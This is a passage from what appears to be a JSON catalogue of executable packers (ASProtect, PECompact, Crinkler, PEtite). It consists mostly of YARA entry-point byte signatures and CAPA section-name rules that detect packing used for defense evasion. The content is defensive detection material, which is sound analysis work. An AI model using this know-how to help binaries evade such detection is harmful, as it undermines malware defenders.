PEiD\r\n{\r\n    strings:\r\n        $a = { BB E9 60 9C FC BF B9 F3 AA 9D 61 C3 55 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASProtect_10_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B E9 }\r\n        $b = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_BRS_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 C3 AA ?? }\r\n        $b = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 00 00 E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_130824_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 F0 58 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_122_123_Beta_21_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 E0 46 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 195,
            "unprotect_id": "U1414",
            "name": "PECompact",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PECompact is a Windows executable compressor.  It has a plugin system that offers virtually customization.",
            "resources": "https://bitsum.com/portfolio/pecompact/",
            "tags": "pecompact",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 97,
                    "key": "capa_detect_pecompact",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_PeCompact",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with PECompact\r\n    namespace: anti-analysis/packer/pecompact\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - Practical Malware Analysis Lab 18-03.exe_\r\n  features:\r\n    - or:\r\n      - section: PEC2TO\r\n      - section: PEC2\r\n      - section: pec\r\n      - section: pec1\r\n      - section: pec2\r\n      - section: pec3\r\n      - section: pec4\r\n      - section: pec5\r\n      - section: pec6\r\n      - section: PEC2MO"
                }
            ]
        },
        {
            "id": 194,
            "unprotect_id": "U1413",
            "name": "Crinkler",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Crinkler is a compressing linker for Windows, specifically targeted towards executables with a size of just a few kilobytes.",
            "resources": "https://github.com/runestubbe/Crinkler",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 111,
                    "key": "yara_detect_crinkler",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Crinkler",
                    "rule": "rule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 42 00 31 DB 43 EB 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 193,
            "unprotect_id": "U1412",
            "name": "PEtite",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Petite is a free Win32 (Windows 95/98/2000/NT/XP/Vista/7/etc) executable (EXE/DLL/etc) compressor. The compressed executables decompress themselves at run time and can be used just like the original non-compressed versions. \r\n\r\nPetite also adds virus detection to the compressed executables; they will check themselves for infection every time they are executed.",
            "resources": "https://www.un4seen.com/petite/",
            "tags": "petite",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 99,
                    "key": "capa_detect_petite",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Petite",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with petite\r\n    namespace: anti-analysis/packer/petite\r\n    authors:\r\n      - \"@_re_fox\"\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 2a7429d60040465f9bd27bbae2beef88\r\n  features:\r\n    - or:\r\n      - section: .petite"
                },
                {
                    "id": 110,
                    "key": "yara_detect_petite",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Petite",
                    "rule": "rule PEtite_v20_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A 00 FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 18 8B CC 8D A0 54 BC 00 00 8B C3 8D 90 E0 15 00 00 68 00 00 00 00 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 E3 00 00 FF 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n        $b = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at 